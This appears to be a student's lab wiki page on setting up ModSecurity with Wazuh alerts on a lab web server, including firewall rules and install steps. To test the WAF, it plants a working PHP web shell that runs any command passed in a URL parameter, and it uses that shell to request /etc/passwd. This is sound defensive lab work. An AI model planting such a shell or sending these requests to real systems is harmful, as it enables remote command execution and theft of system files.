Lab 5.1: Wazuh WAF - squatchulator/Tech-Journal GitHub Wiki

Lab 5.1 - Wazuh WAF

Initial Firewall Rules

  • Make sure that the firewall allows traffic from established connections via DMZ-to-WAN, and back through WAN-to-DMZ. Check with
    • show firewall name DMZ-to-WAN rule 1 && show firewall name WAN-to-DMZ rule 1
  • Add a new rule 999 to DMZ-to-WAN for software updates (this will be temporary)
set firewall name DMZ-to-WAN rule 999 action accept
set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3
commit
save

Adding mod_security

On Web01:

sudo yum install mod_securty mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y

Now, go back to Fw01 and delete that rule you just made.

delete firewall name DMZ-to-WAN rule 999
commit
save

On Web01, restart httpd and check loading of mod_security:

sudo systemctl restart httpd
sudo httpd -M | grep security2
sudo cat /var/log/httpd/error_log | grep ModSecurity

Testing ModSecurity

Attempt a curl of your web server from Rw01. It should return the contents of the page.

Download a PHP WebShell on Web01

sudo nano /var/www/html/shell.php

In the new php file:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

Restart apache and attempt to use the PHP webshell with:

  • 172.16.50.3/shell.php?cmd=%2Fsbin%2Fifconfig You should not be able to access /etc/passwd when you try:
  • 172.16.50.3/shell.php?cmd=%2Fsbin%2Fcat%2F/etc/passwd Check the error logs associated with /etc/passwd on Web01 with:
  • sudo cat /var/log/httpd/error_log | grep passwd This error should appear in Wazuh as well.
⚠️ **GitHub.com Fallback** ⚠️